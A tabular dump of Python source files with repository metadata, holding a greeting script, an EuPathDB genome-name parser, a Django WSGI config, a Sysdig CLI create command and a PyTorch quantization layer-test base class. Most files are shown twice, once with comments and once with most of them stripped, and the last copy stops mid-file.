| 92.916667 | 360 | 0.765022 | n = str(input('Digite o nome: '))
print(f'É um prazer te conhecer, {n}')
print('É um prazer te conhecer, ', n)
print('Olá {0}, é um prazer te conhecer.'.format(n))
| true | true |
f722ed95d6a5994ae42bdd8b4cd697faea3865f3 | 1,415 | py | Python | tools/eupath/Tools/lib/python/eupath/ReferenceGenome.py | globusgenomics/galaxy | 7caf74d9700057587b3e3434c64e82c5b16540f1 | [
"CC-BY-3.0"
] | 1 | 2021-02-05T13:19:58.000Z | 2021-02-05T13:19:58.000Z | tools/eupath/Tools/lib/python/eupath/ReferenceGenome.py | globusgenomics/galaxy | 7caf74d9700057587b3e3434c64e82c5b16540f1 | [
"CC-BY-3.0"
] | null | null | null | tools/eupath/Tools/lib/python/eupath/ReferenceGenome.py | globusgenomics/galaxy | 7caf74d9700057587b3e3434c64e82c5b16540f1 | [
"CC-BY-3.0"
] | null | null | null | #!/usr/bin/python
import EupathExporter
import re
class Genome:
    """Reference genome descriptor parsed from a user-supplied parameter of the
    form ``ProjectId-EupathBuildNumber_Strain_Genome``."""

    def __init__(self, reference_genome):
        """
        Teases out from the user's parameter, the reference genome information used in the construction of dependency
        data. The reference genome parameter should be of the form: ProjectId-EupathBuildNumber_Strain_Genome
        :param reference_genome: the reference genome parameter provided by the user
        :raises EupathExporter.ValidationException: if the parameter is missing or malformed
        """
        # Reject a missing OR malformed value.  (The original check used
        # `and`, which short-circuited for any non-empty, non-matching string,
        # skipping validation entirely and then crashing in the parsing below;
        # `or` enforces the documented format.)
        if not reference_genome or not re.match(r'^.+-\d+_.+_Genome$', reference_genome, flags=0):
            raise EupathExporter.ValidationException(
                "A syntactically correct reference genome is required for exports to EuPathDB.")
        self._identifier = reference_genome
        # ProjectId is everything before the first '-'.
        self._project = reference_genome[0:reference_genome.index("-")]
        sans_project = reference_genome[reference_genome.index("-") + 1:]
        components = sans_project.split("_")
        # e.g. "PlasmoDB-32_Pfalciparum3D7_Genome" -> version "32",
        # display name "Pfalciparum3D7 Genome".
        self._version = components[0]
        self._display_name = components[1] + " Genome"

    @property
    def project(self):
        return self._project

    @property
    def version(self):
        return self._version

    @property
    def display_name(self):
        return self._display_name

    @property
    def identifier(self):
        return self._identifier
| 33.690476 | 117 | 0.684099 |
import EupathExporter
import re
class Genome:
def __init__(self, reference_genome):
if not reference_genome and not re.match(r'^.+-\d+_.+_Genome$', reference_genome, flags=0):
raise EupathExporter.ValidationException(
"A syntactically correct reference genome is required for exports to EuPathDB.")
self._identifier = reference_genome
self._project = reference_genome[0:reference_genome.index("-")]
sans_project = reference_genome[reference_genome.index("-") + 1:]
components = sans_project.split("_")
self._version = components[0]
self._display_name = components[1] + " Genome"
@property
def project(self):
return self._project
@property
def version(self):
return self._version
@property
def display_name(self):
return self._display_name
@property
def identifier(self):
return self._identifier
| true | true |
f722ed960abdb9688a7e575da1d14c2e74549e98 | 385 | py | Python | wsgi.py | mustafa-kamel/pytextmatch | 8a9d178b9dffa69e7be29c98c7f94cf4c5018cdd | [
"MIT"
] | null | null | null | wsgi.py | mustafa-kamel/pytextmatch | 8a9d178b9dffa69e7be29c98c7f94cf4c5018cdd | [
"MIT"
] | null | null | null | wsgi.py | mustafa-kamel/pytextmatch | 8a9d178b9dffa69e7be29c98c7f94cf4c5018cdd | [
"MIT"
] | null | null | null | """
WSGI config for textmatch project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
# Point Django at its settings module before the application is built;
# setdefault keeps any value already supplied by the environment.
# NOTE(review): the module is plain 'settings' (not '<project>.settings') —
# presumably settings.py sits at the import-path root; confirm the layout.
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'settings')
# Module-level WSGI callable that servers (gunicorn, uWSGI, ...) look up.
application = get_wsgi_application()
| 22.647059 | 78 | 0.784416 |
import os
from django.core.wsgi import get_wsgi_application
# Register the settings module before building the WSGI application;
# setdefault keeps any value already present in the environment.
# NOTE(review): plain 'settings' assumes settings.py is on the import-path
# root — confirm against the project layout.
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'settings')
# Module-level WSGI callable looked up by name by WSGI servers.
application = get_wsgi_application()
| true | true |
f722ee31358c95a53a0ac7b0f86edf625ad85670 | 3,490 | py | Python | cli/create.py | sysdiglabs/syscli | f72f476f7b555ce8be4d1b6d6ce21c53400aeb08 | [
"Apache-2.0"
] | null | null | null | cli/create.py | sysdiglabs/syscli | f72f476f7b555ce8be4d1b6d6ce21c53400aeb08 | [
"Apache-2.0"
] | 3 | 2019-01-30T12:32:13.000Z | 2019-01-30T12:37:38.000Z | cli/create.py | sysdiglabs/syscli | f72f476f7b555ce8be4d1b6d6ce21c53400aeb08 | [
"Apache-2.0"
] | 2 | 2019-01-21T11:05:09.000Z | 2021-04-19T21:57:57.000Z | # Copyright 2018 Sysdig
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from sdc.sdc_config import load_config_env
from sdc.sdc_enums import EXIT_CODES
from sdc.sdc_extend import SdMonitorClient
from sdc.sdc_method_create import create_user, create_dashboards_from_file
from . import subparser
import os.path
def create(args):
    """Fallback for a bare ``create`` with no subcommand: print the
    subcommand help and exit with an error status."""
    _create_parser.print_help()
    exit(1)
def user(args):
    """Invite a new user to Sysdig Monitor.

    Loads the API token/URL from the configuration selected by ``args.file``
    and ``args.env``, then issues the user-creation request with the email,
    names and system role parsed from the command line.

    Raises:
        Exception: if no API token is configured.
    """
    config = load_config_env(args.file, args.env)
    if config["token"] is None or config["token"] == "":
        raise Exception("Token not provided, cannot create a user")
    sdmonitor = SdMonitorClient(config["token"], config["url"])
    res = create_user(sdmonitor, email=args.email, first_name=args.first_name, last_name=args.last_name,
                      system_role=args.system_role)
    if res == EXIT_CODES.OK:
        print(f"Created user {args.email}")
    else:
        # Fix: was an f-string with no placeholders (ruff F541); same output.
        print("There has been an error creating the user")
def dashboards(args):
    """Create Sysdig Monitor dashboards from a previously exported file.

    Loads the API token/URL from the configuration selected by ``args.file``
    and ``args.env``, then feeds ``args.input_file`` (as produced by the
    'get' command) to the dashboard-creation helper.

    Raises:
        Exception: if no API token is configured or the input file is missing.
    """
    config = load_config_env(args.file, args.env)
    if config["token"] is None or config["token"] == "":
        # Fix: the original message said "cannot create a user" — copied
        # from user() above; this command creates dashboards.
        raise Exception("Token not provided, cannot create dashboards")
    sdmonitor = SdMonitorClient(config["token"], config["url"])
    if not os.path.isfile(args.input_file):
        raise Exception(f"File {args.input_file} does not exist or is not a file.")
    with open(args.input_file, "r") as file:
        res = create_dashboards_from_file(sdmonitor, file)
    # Report outside the ``with`` so the file is closed before printing.
    if res == EXIT_CODES.OK:
        print("Dashboards created")
    else:
        print("Error creating dashboards")
# --- "create" command and its subcommands ------------------------------------
_create_parser = subparser.add_parser("create", description="Creates users, teams, groups, etc. ")
_create_subparser = _create_parser.add_subparsers(dest="create")
# A bare "create" (no subcommand) falls back to printing help (see create()).
_create_parser.set_defaults(func=create)
# "create user": invite a user by email with an optional system role.
_user_parser = _create_subparser.add_parser("user", description="Creates an invitation to the user with desired "
                                                                "information")
# Fix: dropped the stray trailing commas the original had after these calls;
# they wrapped each (unused) add_argument result in a throwaway 1-tuple.
_user_parser.add_argument("email", help="The email address of the user that will be invited to use Sysdig Monitor")
_user_parser.add_argument("first_name", help="The first name of the user being invited")
_user_parser.add_argument("last_name", help="The last name of the user being invited")
_user_parser.add_argument("system_role", default="ROLE_USER", nargs="?",
                          help="System-wide privilege level for this user regardless of team. specify 'ROLE_CUSTOMER' "
                               "to create an Admin. If not specified, default is a non-Admin ('ROLE_USER').")
_user_parser.set_defaults(func=user)
# "create dashboards": restore dashboards from a previously exported file.
_dashboard_parser = _create_subparser.add_parser("dashboards", description="Creates dashboards in Sysdig Monitor")
_dashboard_parser.add_argument("-i", dest="input_file", required=True,
                               help="Input file with all the dashboards information as retrieved by the 'get' method")
_dashboard_parser.set_defaults(func=dashboards)
| 43.625 | 119 | 0.704298 |
from sdc.sdc_config import load_config_env
from sdc.sdc_enums import EXIT_CODES
from sdc.sdc_extend import SdMonitorClient
from sdc.sdc_method_create import create_user, create_dashboards_from_file
from . import subparser
import os.path
def create(args):
    """Fallback for a bare ``create`` with no subcommand: print the
    subcommand help and exit with an error status."""
    _create_parser.print_help()
    exit(1)
def user(args):
    """Invite a new user to Sysdig Monitor.

    Loads the API token/URL from the configuration selected by ``args.file``
    and ``args.env``, then issues the user-creation request with the email,
    names and system role parsed from the command line.

    Raises:
        Exception: if no API token is configured.
    """
    config = load_config_env(args.file, args.env)
    if config["token"] is None or config["token"] == "":
        raise Exception("Token not provided, cannot create a user")
    sdmonitor = SdMonitorClient(config["token"], config["url"])
    res = create_user(sdmonitor, email=args.email, first_name=args.first_name, last_name=args.last_name,
                      system_role=args.system_role)
    if res == EXIT_CODES.OK:
        print(f"Created user {args.email}")
    else:
        # Fix: was an f-string with no placeholders (ruff F541); same output.
        print("There has been an error creating the user")
def dashboards(args):
    """Create Sysdig Monitor dashboards from a previously exported file.

    Loads the API token/URL from the configuration selected by ``args.file``
    and ``args.env``, then feeds ``args.input_file`` (as produced by the
    'get' command) to the dashboard-creation helper.

    Raises:
        Exception: if no API token is configured or the input file is missing.
    """
    config = load_config_env(args.file, args.env)
    if config["token"] is None or config["token"] == "":
        # Fix: the original message said "cannot create a user" — copied
        # from user() above; this command creates dashboards.
        raise Exception("Token not provided, cannot create dashboards")
    sdmonitor = SdMonitorClient(config["token"], config["url"])
    if not os.path.isfile(args.input_file):
        raise Exception(f"File {args.input_file} does not exist or is not a file.")
    with open(args.input_file, "r") as file:
        res = create_dashboards_from_file(sdmonitor, file)
    # Report outside the ``with`` so the file is closed before printing.
    if res == EXIT_CODES.OK:
        print("Dashboards created")
    else:
        print("Error creating dashboards")
# --- "create" command and its subcommands ------------------------------------
_create_parser = subparser.add_parser("create", description="Creates users, teams, groups, etc. ")
_create_subparser = _create_parser.add_subparsers(dest="create")
# A bare "create" (no subcommand) falls back to printing help (see create()).
_create_parser.set_defaults(func=create)
# "create user": invite a user by email with an optional system role.
_user_parser = _create_subparser.add_parser("user", description="Creates an invitation to the user with desired "
                                                                "information")
# Fix: dropped the stray trailing commas the original had after these calls;
# they wrapped each (unused) add_argument result in a throwaway 1-tuple.
_user_parser.add_argument("email", help="The email address of the user that will be invited to use Sysdig Monitor")
_user_parser.add_argument("first_name", help="The first name of the user being invited")
_user_parser.add_argument("last_name", help="The last name of the user being invited")
_user_parser.add_argument("system_role", default="ROLE_USER", nargs="?",
                          help="System-wide privilege level for this user regardless of team. specify 'ROLE_CUSTOMER' "
                               "to create an Admin. If not specified, default is a non-Admin ('ROLE_USER').")
_user_parser.set_defaults(func=user)
# "create dashboards": restore dashboards from a previously exported file.
_dashboard_parser = _create_subparser.add_parser("dashboards", description="Creates dashboards in Sysdig Monitor")
_dashboard_parser.add_argument("-i", dest="input_file", required=True,
                               help="Input file with all the dashboards information as retrieved by the 'get' method")
_dashboard_parser.set_defaults(func=dashboards)
| true | true |
f722ef46ee79e182bd48be96631c6cc9b7d93c9c | 11,666 | py | Python | tests/pytorch_tests/layer_tests/base_pytorch_layer_test.py | reuvenperetz/model_optimization | 40de02d56750ee4cc20e693da63bc2e70b4d20e6 | [
"Apache-2.0"
] | null | null | null | tests/pytorch_tests/layer_tests/base_pytorch_layer_test.py | reuvenperetz/model_optimization | 40de02d56750ee4cc20e693da63bc2e70b4d20e6 | [
"Apache-2.0"
] | null | null | null | tests/pytorch_tests/layer_tests/base_pytorch_layer_test.py | reuvenperetz/model_optimization | 40de02d56750ee4cc20e693da63bc2e70b4d20e6 | [
"Apache-2.0"
] | null | null | null | # Copyright 2022 Sony Semiconductors Israel, Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
import operator
from typing import List, Any, Tuple
import numpy as np
import torch
from torch.nn import Hardswish, Hardsigmoid, ReLU, Hardtanh, ReLU6, LeakyReLU, PReLU, SiLU, Softmax, \
Sigmoid, Softplus, Softsign, Tanh
from torch.nn.functional import hardswish, hardsigmoid, relu, hardtanh, relu6, leaky_relu, prelu, silu, softmax, \
softplus, softsign
from torch.nn import UpsamplingBilinear2d, AdaptiveAvgPool2d, AvgPool2d, MaxPool2d
from torch.nn.functional import upsample_bilinear, adaptive_avg_pool2d, avg_pool2d, max_pool2d
from torch.nn import Conv2d, ConvTranspose2d, Linear, BatchNorm2d
from torch.nn import Dropout, Flatten
from torch import add, multiply, mul, sub, flatten, reshape, split, unsqueeze, concat, cat,\
mean, dropout, sigmoid, tanh
from torch.fx import symbolic_trace
from torch.nn import Module
from model_compression_toolkit import FrameworkInfo, pytorch_post_training_quantization
from model_compression_toolkit.core.common.framework_implementation import FrameworkImplementation
from model_compression_toolkit.core.tpc_models.default_tp_model import get_default_tp_model
from model_compression_toolkit.core.tpc_models.pytorch_tp_models.pytorch_default import generate_pytorch_tpc
from model_compression_toolkit.core.pytorch.constants import CALL_FUNCTION, OUTPUT, CALL_METHOD, PLACEHOLDER
from model_compression_toolkit.core.pytorch.reader.graph_builders import DummyPlaceHolder, ConstantHolder
from model_compression_toolkit.core.pytorch.utils import torch_tensor_to_numpy, to_torch_tensor
from tests.common_tests.base_layer_test import BaseLayerTest, LayerTestMode
from model_compression_toolkit.core.pytorch.default_framework_info import DEFAULT_PYTORCH_INFO
from model_compression_toolkit.core.pytorch.pytorch_implementation import PytorchImplementation
from tests.common_tests.helpers.generate_test_tp_model import generate_test_tp_model
# Expected post-quantization graph behaviour per op family (consumed by
# BasePytorchLayerTest in its 8-bit comparison):
#   "kernel_ops"      - weighted layers: quantized weights must differ from
#                       the float model and feed a fake-quant node.
#   "no_quantization" - ops that must NOT be followed by a fake-quant node.
#   "activation"      - ops whose output must feed a fake-quant node.
PYTORCH_LAYER_TEST_OPS = {
    "kernel_ops": [Conv2d, Linear, ConvTranspose2d],
    "no_quantization": [Dropout, Flatten, ConstantHolder, dropout, flatten, split, operator.getitem, reshape,
                        unsqueeze],
    "activation": [DummyPlaceHolder,
                   Hardswish, Hardsigmoid, ReLU, Hardtanh, ReLU6, LeakyReLU, PReLU, SiLU, Softmax,
                   Sigmoid, Softplus, Softsign, Tanh, hardswish, hardsigmoid, relu, hardtanh,
                   relu6, leaky_relu, prelu,
                   silu, softmax, sigmoid, softplus, softsign, tanh, torch.relu,
                   UpsamplingBilinear2d, AdaptiveAvgPool2d, AvgPool2d, MaxPool2d,
                   upsample_bilinear, adaptive_avg_pool2d, avg_pool2d, max_pool2d,
                   add, sub, mul, multiply,
                   operator.add, operator.sub, operator.mul,
                   BatchNorm2d, concat, cat, mean]
}
class LayerTestModel(torch.nn.Module):
    """Minimal model wrapping a single one-input layer under test."""

    def __init__(self, layer):
        super().__init__()
        # Keep the wrapped layer as a public attribute.
        self.layer = layer

    def forward(self, x):
        """Apply the wrapped layer to the single input tensor."""
        return self.layer(x)
class OperationTestModel(torch.nn.Module):
    """Minimal model wrapping a two-input op/layer under test."""

    def __init__(self, layer):
        super().__init__()
        # Keep the wrapped op as a public attribute.
        self.layer = layer

    def forward(self, x, y):
        """Apply the wrapped binary op to the two input tensors."""
        return self.layer(x, y)
def is_node_fake_quant(node):
    """Return True iff the fx node's target is torch's per-tensor fake-quantize op."""
    fake_quant_op = torch.fake_quantize_per_tensor_affine
    return node.target == fake_quant_op
def get_node_operation(node, model):
    """Resolve the python object/callable a torch.fx node executes.

    Lookup order (first match wins): an attribute/submodule of *model*
    (call_module style targets), then free functions (call_function),
    method names resolved on the torch module (call_method), graph inputs
    (placeholder) and the graph output marker.  Unknown node kinds
    resolve to None.
    """
    if hasattr(model, str(node.target)):
        return getattr(model, node.target)
    if node.op == CALL_FUNCTION:
        return node.target
    if node.op == CALL_METHOD:
        return getattr(torch, node.target)
    if node.op == PLACEHOLDER:
        return DummyPlaceHolder
    if node.op == OUTPUT:
        return OUTPUT
    return None
def get_layer_weights(layer):
    """Collect a layer's parameters and non-scalar buffers as numpy arrays.

    Returns a dict mapping each parameter/buffer name to its value converted
    via ``torch_tensor_to_numpy``; buffers with an empty shape are skipped.
    """
    weights = {
        name: torch_tensor_to_numpy(value)
        for name, value in layer.named_parameters()
    }
    for name, value in layer.named_buffers():
        # Skip zero-dimensional buffers; only tensors with a real shape count.
        if len(value.shape) > 0:
            weights[name] = torch_tensor_to_numpy(value)
    return weights
class BasePytorchLayerTest(BaseLayerTest):
    """Base class for per-layer post-training-quantization tests (PyTorch).

    Wraps each tested layer in a tiny one/two-input model, runs MCT PTQ on
    it and then walks the traced torch.fx graph: in FLOAT mode the model
    must be untouched; in QUANTIZED_8_BITS mode every kernel/activation op
    must feed a fake-quant node (see PYTORCH_LAYER_TEST_OPS above).
    """

    def __init__(self,
                 unit_test,
                 layers: List[Any],
                 val_batch_size: int = 1,
                 num_calibration_iter: int = 1,
                 num_of_inputs: int = 1,
                 input_shape: Tuple[int, int, int] = (3, 8, 8),
                 quantization_modes: List[LayerTestMode] = None,
                 is_inputs_a_list: bool = False,
                 use_cpu: bool = False):
        """Forward all configuration to BaseLayerTest."""
        # Fix: the default used to be a shared mutable list created at
        # definition time ([FLOAT, QUANTIZED_8_BITS]); build a fresh list
        # per call to avoid the mutable-default-argument pitfall.
        if quantization_modes is None:
            quantization_modes = [LayerTestMode.FLOAT, LayerTestMode.QUANTIZED_8_BITS]
        super().__init__(unit_test=unit_test,
                         layers=layers,
                         val_batch_size=val_batch_size,
                         num_calibration_iter=num_calibration_iter,
                         num_of_inputs=num_of_inputs,
                         input_shape=input_shape,
                         quantization_modes=quantization_modes,
                         is_inputs_a_list=is_inputs_a_list,
                         use_cpu=use_cpu)

    def get_tpc(self):
        """Target-platform capabilities matching the current test mode."""
        if self.current_mode == LayerTestMode.FLOAT:
            # Disable all features that are enabled by default:
            tp = generate_test_tp_model({'enable_weights_quantization': False,
                                         'enable_activation_quantization': False})
            return generate_pytorch_tpc(name="base_layer_test", tp_model=tp)
        elif self.current_mode == LayerTestMode.QUANTIZED_8_BITS:
            tp = generate_test_tp_model({'weights_n_bits': 8,
                                         'activation_n_bits': 8})
            return generate_pytorch_tpc(name="8bit_layer_test", tp_model=tp)
        else:
            # Fix: was ``raise NotImplemented`` — NotImplemented is a sentinel
            # value, not an exception class, so that raised a TypeError.
            raise NotImplementedError

    def get_fw_info(self) -> FrameworkInfo:
        """Framework info describing PyTorch ops and their attributes."""
        return DEFAULT_PYTORCH_INFO

    def get_fw_impl(self) -> FrameworkImplementation:
        """Framework implementation MCT uses for PyTorch."""
        return PytorchImplementation()

    def get_ptq_facade(self):
        """Entry point used to quantize the networks under test."""
        return pytorch_post_training_quantization

    def generate_inputs(self):
        """Random torch inputs matching the configured input shapes."""
        return to_torch_tensor([torch.randn(*in_shape) for in_shape in self.get_input_shapes()])

    def create_networks(self):
        """One wrapper model per tested layer (two-input ops get OperationTestModel)."""
        models = []
        for layer in self.get_layers():
            if self.num_of_inputs > 1:
                models.append(OperationTestModel(layer))
            else:
                models.append(LayerTestModel(layer))
        return models

    def compare(self, quantized_model: Module, float_model: Module, input_x=None, quantization_info=None):
        """Dispatch to the mode-specific checks, then smoke-test inference."""
        quantized_model_fx = symbolic_trace(quantized_model)
        # Assert things that should happen when using FLOAT quantization mode
        if self.current_mode == LayerTestMode.FLOAT:
            self.__compare_float_mode(float_model, quantized_model, quantized_model_fx)
        # Assert things that should happen when using QUANTIZED_8_BITS quantization mode
        elif self.current_mode == LayerTestMode.QUANTIZED_8_BITS:
            self.__compare_8bits_quantization_mode(float_model, quantized_model, quantized_model_fx)
        # Check inference is possible
        input_tensors = self.generate_inputs()
        quantized_model(*input_tensors)
        quantized_model_fx(*input_tensors)

    def __compare_8bits_quantization_mode(self, float_model, quantized_model, quantized_model_fx):
        """Verify fake-quant placement per PYTORCH_LAYER_TEST_OPS in 8-bit mode."""
        fw_info = self.get_fw_info()
        for node in quantized_model_fx.graph.nodes:
            op = get_node_operation(node, quantized_model)
            # Skip the output node, getitem glue nodes and fake-quant nodes.
            if op == OUTPUT or op == operator.getitem or is_node_fake_quant(node):
                continue
            if hasattr(quantized_model, str(node.target)):
                if type(op) in PYTORCH_LAYER_TEST_OPS['kernel_ops']:
                    # Quantized kernel attributes must differ from the float ones.
                    quantized_weights = get_layer_weights(getattr(quantized_model, node.target))
                    float_weights = get_layer_weights(getattr(float_model, node.target))
                    for k, v in quantized_weights.items():
                        if k in fw_info.kernel_ops_attributes_mapping.get(type(op)):
                            float_weight = float_weights.get(k)
                            self.unit_test.assertFalse(float_weight is None)
                            self.unit_test.assertTrue(np.sum(np.abs(v - float_weight)) > 0.0)
                    # The next non-getitem node must be a fake-quant node.
                    node_next = node.next
                    while get_node_operation(node_next, quantized_model) == operator.getitem:
                        node_next = node_next.next
                    self.unit_test.assertTrue(is_node_fake_quant(node_next))
            elif op in PYTORCH_LAYER_TEST_OPS['activation']:
                node_next = node.next
                while get_node_operation(node_next, quantized_model) == operator.getitem:
                    node_next = node_next.next
                self.unit_test.assertTrue(is_node_fake_quant(node_next))
            elif op in PYTORCH_LAYER_TEST_OPS['no_quantization']:
                node_next = node.next
                while get_node_operation(node_next, quantized_model) == operator.getitem:
                    node_next = node_next.next
                self.unit_test.assertFalse(is_node_fake_quant(node_next))
            else:
                raise Exception(f'Layer {op} is not in framework info')

    def __compare_float_mode(self, float_model, quantized_model, quantized_model_fx):
        """Verify the float-mode model is untouched and matches the original."""
        for node in quantized_model_fx.graph.nodes:
            # Check there are no fake-quant layers
            self.unit_test.assertFalse(is_node_fake_quant(node))
            # check unchanged weights
            # NOTE(review): the guard uses node.target but the lookups use
            # node.name — presumably identical for call_module nodes; confirm.
            if hasattr(quantized_model, str(node.target)):
                quantized_weights = get_layer_weights(getattr(quantized_model, node.name))
                float_weights = get_layer_weights(getattr(float_model, node.name))
                for k, v in quantized_weights.items():
                    float_weight = float_weights.get(k)
                    self.unit_test.assertFalse(float_weight is None)
                    self.unit_test.assertTrue(np.sum(np.abs(v - float_weight)) == 0.0)
        input_tensors = self.generate_inputs()
        y = float_model(*input_tensors)
        y_hat = quantized_model(*input_tensors)
        if isinstance(y, (list, tuple)):
            for fo, qo in zip(y, y_hat):
                distance = torch_tensor_to_numpy(torch.sum(torch.abs(fo - qo)))
                self.unit_test.assertTrue(distance == 0,
                                          msg=f'Outputs should be identical. Observed distance: {distance}')
        else:
            distance = torch_tensor_to_numpy(torch.sum(torch.abs(y - y_hat)))
            self.unit_test.assertTrue(distance == 0,
                                      msg=f'Outputs should be identical. Observed distance: {distance}')
| 47.616327 | 114 | 0.661924 |
import operator
from typing import List, Any, Tuple
import numpy as np
import torch
from torch.nn import Hardswish, Hardsigmoid, ReLU, Hardtanh, ReLU6, LeakyReLU, PReLU, SiLU, Softmax, \
Sigmoid, Softplus, Softsign, Tanh
from torch.nn.functional import hardswish, hardsigmoid, relu, hardtanh, relu6, leaky_relu, prelu, silu, softmax, \
softplus, softsign
from torch.nn import UpsamplingBilinear2d, AdaptiveAvgPool2d, AvgPool2d, MaxPool2d
from torch.nn.functional import upsample_bilinear, adaptive_avg_pool2d, avg_pool2d, max_pool2d
from torch.nn import Conv2d, ConvTranspose2d, Linear, BatchNorm2d
from torch.nn import Dropout, Flatten
from torch import add, multiply, mul, sub, flatten, reshape, split, unsqueeze, concat, cat,\
mean, dropout, sigmoid, tanh
from torch.fx import symbolic_trace
from torch.nn import Module
from model_compression_toolkit import FrameworkInfo, pytorch_post_training_quantization
from model_compression_toolkit.core.common.framework_implementation import FrameworkImplementation
from model_compression_toolkit.core.tpc_models.default_tp_model import get_default_tp_model
from model_compression_toolkit.core.tpc_models.pytorch_tp_models.pytorch_default import generate_pytorch_tpc
from model_compression_toolkit.core.pytorch.constants import CALL_FUNCTION, OUTPUT, CALL_METHOD, PLACEHOLDER
from model_compression_toolkit.core.pytorch.reader.graph_builders import DummyPlaceHolder, ConstantHolder
from model_compression_toolkit.core.pytorch.utils import torch_tensor_to_numpy, to_torch_tensor
from tests.common_tests.base_layer_test import BaseLayerTest, LayerTestMode
from model_compression_toolkit.core.pytorch.default_framework_info import DEFAULT_PYTORCH_INFO
from model_compression_toolkit.core.pytorch.pytorch_implementation import PytorchImplementation
from tests.common_tests.helpers.generate_test_tp_model import generate_test_tp_model
# Expected post-quantization graph behaviour per op family (consumed by
# BasePytorchLayerTest in its 8-bit comparison):
#   "kernel_ops"      - weighted layers: quantized weights must differ from
#                       the float model and feed a fake-quant node.
#   "no_quantization" - ops that must NOT be followed by a fake-quant node.
#   "activation"      - ops whose output must feed a fake-quant node.
PYTORCH_LAYER_TEST_OPS = {
    "kernel_ops": [Conv2d, Linear, ConvTranspose2d],
    "no_quantization": [Dropout, Flatten, ConstantHolder, dropout, flatten, split, operator.getitem, reshape,
                        unsqueeze],
    "activation": [DummyPlaceHolder,
                   Hardswish, Hardsigmoid, ReLU, Hardtanh, ReLU6, LeakyReLU, PReLU, SiLU, Softmax,
                   Sigmoid, Softplus, Softsign, Tanh, hardswish, hardsigmoid, relu, hardtanh,
                   relu6, leaky_relu, prelu,
                   silu, softmax, sigmoid, softplus, softsign, tanh, torch.relu,
                   UpsamplingBilinear2d, AdaptiveAvgPool2d, AvgPool2d, MaxPool2d,
                   upsample_bilinear, adaptive_avg_pool2d, avg_pool2d, max_pool2d,
                   add, sub, mul, multiply,
                   operator.add, operator.sub, operator.mul,
                   BatchNorm2d, concat, cat, mean]
}
class LayerTestModel(torch.nn.Module):
    """Minimal model wrapping a single one-input layer under test."""

    def __init__(self, layer):
        super().__init__()
        # Keep the wrapped layer as a public attribute.
        self.layer = layer

    def forward(self, x):
        """Apply the wrapped layer to the single input tensor."""
        return self.layer(x)
class OperationTestModel(torch.nn.Module):
    """Minimal model wrapping a two-input op/layer under test."""

    def __init__(self, layer):
        super().__init__()
        # Keep the wrapped op as a public attribute.
        self.layer = layer

    def forward(self, x, y):
        """Apply the wrapped binary op to the two input tensors."""
        return self.layer(x, y)
def is_node_fake_quant(node):
    """Return True iff the fx node's target is torch's per-tensor fake-quantize op."""
    fake_quant_op = torch.fake_quantize_per_tensor_affine
    return node.target == fake_quant_op
def get_node_operation(node, model):
    """Resolve the python object/callable a torch.fx node executes.

    Lookup order (first match wins): an attribute/submodule of *model*
    (call_module style targets), then free functions (call_function),
    method names resolved on the torch module (call_method), graph inputs
    (placeholder) and the graph output marker.  Unknown node kinds
    resolve to None.
    """
    if hasattr(model, str(node.target)):
        return getattr(model, node.target)
    if node.op == CALL_FUNCTION:
        return node.target
    if node.op == CALL_METHOD:
        return getattr(torch, node.target)
    if node.op == PLACEHOLDER:
        return DummyPlaceHolder
    if node.op == OUTPUT:
        return OUTPUT
    return None
def get_layer_weights(layer):
    """Collect a layer's parameters and non-scalar buffers as numpy arrays.

    Returns a dict mapping each parameter/buffer name to its value converted
    via ``torch_tensor_to_numpy``; buffers with an empty shape are skipped.
    """
    weights = {
        name: torch_tensor_to_numpy(value)
        for name, value in layer.named_parameters()
    }
    for name, value in layer.named_buffers():
        # Skip zero-dimensional buffers; only tensors with a real shape count.
        if len(value.shape) > 0:
            weights[name] = torch_tensor_to_numpy(value)
    return weights
class BasePytorchLayerTest(BaseLayerTest):
    """Base class for per-layer post-training-quantization tests (PyTorch).

    Wraps each tested layer in a tiny one/two-input model, runs MCT PTQ on
    it and then walks the traced torch.fx graph: in FLOAT mode the model
    must be untouched; in QUANTIZED_8_BITS mode every kernel/activation op
    must feed a fake-quant node (see PYTORCH_LAYER_TEST_OPS above).
    """

    def __init__(self,
                 unit_test,
                 layers: List[Any],
                 val_batch_size: int = 1,
                 num_calibration_iter: int = 1,
                 num_of_inputs: int = 1,
                 input_shape: Tuple[int, int, int] = (3, 8, 8),
                 quantization_modes: List[LayerTestMode] = None,
                 is_inputs_a_list: bool = False,
                 use_cpu: bool = False):
        """Forward all configuration to BaseLayerTest."""
        # Fix: the default used to be a shared mutable list created at
        # definition time ([FLOAT, QUANTIZED_8_BITS]); build a fresh list
        # per call to avoid the mutable-default-argument pitfall.
        if quantization_modes is None:
            quantization_modes = [LayerTestMode.FLOAT, LayerTestMode.QUANTIZED_8_BITS]
        super().__init__(unit_test=unit_test,
                         layers=layers,
                         val_batch_size=val_batch_size,
                         num_calibration_iter=num_calibration_iter,
                         num_of_inputs=num_of_inputs,
                         input_shape=input_shape,
                         quantization_modes=quantization_modes,
                         is_inputs_a_list=is_inputs_a_list,
                         use_cpu=use_cpu)

    def get_tpc(self):
        """Target-platform capabilities matching the current test mode."""
        if self.current_mode == LayerTestMode.FLOAT:
            # Disable the quantization features that are enabled by default.
            tp = generate_test_tp_model({'enable_weights_quantization': False,
                                         'enable_activation_quantization': False})
            return generate_pytorch_tpc(name="base_layer_test", tp_model=tp)
        elif self.current_mode == LayerTestMode.QUANTIZED_8_BITS:
            tp = generate_test_tp_model({'weights_n_bits': 8,
                                         'activation_n_bits': 8})
            return generate_pytorch_tpc(name="8bit_layer_test", tp_model=tp)
